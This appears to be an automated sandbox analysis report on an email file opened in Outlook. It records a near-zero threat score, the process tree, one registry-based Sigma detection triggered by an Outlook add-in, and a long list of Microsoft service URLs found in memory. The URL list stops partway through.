Windows Analysis Report
9ba54f65-7bc2-d549-b688-53131649ef52.eml

Overview

General Information

Sample name:9ba54f65-7bc2-d549-b688-53131649ef52.eml
Analysis ID:1532881
MD5:60624e033806c4f3cbaf007f40a20567
SHA1:30b3376aadd75ae410e80dd634bb0b94c18f9475
SHA256:e923f8572bcc23f76e60ea7200c48ae370c9648cb79c5bf96fc715f6bd43341a
Detection

Score:1
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification

Classification

  • System is w10x64
  • OUTLOOK.EXE (PID: 7832 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\9ba54f65-7bc2-d549-b688-53131649ef52.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 7372 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "D675929E-58F5-446D-A282-324992C7C8DE" "6968D5F9-FDC3-4959-BF37-5B5D02ACDBD9" "7832" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
  • cleanup
No configs have been found
No yara matches
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 7832, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
No Suricata rule has matched

Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.aadrm.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.aadrm.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.addins.omex.office.net/api/addins/search
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.addins.store.office.com/app/query
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.cortana.ai
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.diagnostics.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.diagnosticssdf.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.microsoftstream.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.microsoftstream.com/api/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.office.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.officescripts.microsoftusercontent.com/api
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.onedrive.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://api.scheduler.
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://apis.live.net/v5.0/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://apis.mobile.m365.svc.cloud.microsoft
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://app.powerbi.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://augloop.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://augloop.office.com/v2
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://autodiscover-s.outlook.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://canary.designerapp.
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://cdn.designerapp.osi.office.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://cdn.designerapp.osi.office.net/designer-mobile
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/fonts
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-assets
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-dynamic-strings
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-home-screen
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://cdn.entity.
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://cdn.hubblecontent.osi.office.net/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://cdn.int.designerapp.osi.office.net/fonts
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://clients.config.office.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://clients.config.office.net/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://clients.config.office.net/c2r/v1.0/DeltaAdvisory
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://cortana.ai
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://cortana.ai/api
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://cr.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://d.docs.live.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://dataservice.o365filtering.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://dataservice.o365filtering.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://designerapp.azurewebsites.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://designerappservice.officeapps.live.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://dev.cortana.ai
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://devnull.onenote.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://directory.services.
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://ecs.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://ecs.office.com/config/v1/Designer
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://edge.skype.com/registrar/prod
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://edge.skype.com/rps
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://enrichment.osi.office.net/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601652342626
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://entitlement.diagnostics.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://fpastorage.cdn.office.net/%s
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xml
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://graph.ppe.windows.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://graph.ppe.windows.net/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://graph.windows.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://graph.windows.net/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/pivots/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://ic3.teams.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://incidents.diagnostics.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://invites.office.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://lifecycle.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://login.microsoftonline.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://login.microsoftonline.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://login.microsoftonline.com/organizations
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://login.windows.local
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://make.powerautomate.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://management.azure.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://management.azure.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://messagebroker.mobile.m365.svc.cloud.microsoft
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://messaging.action.office.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://messaging.engagement.office.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://messaging.lifecycle.office.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://messaging.office.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://mss.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://my.microsoftpersonalcontent.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://ncus.contentsync.
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://ncus.pagecontentsync.
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://officeapps.live.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://officepyservice.office.net/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://officepyservice.office.net/service.functionality
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://onedrive.live.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://onedrive.live.com/embed?
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://otelrules.azureedge.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://otelrules.svc.static.microsoft
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://outlook.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://outlook.office.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://outlook.office365.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://outlook.office365.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://outlook.office365.com/connectors
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://pages.store.office.com/review/query
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
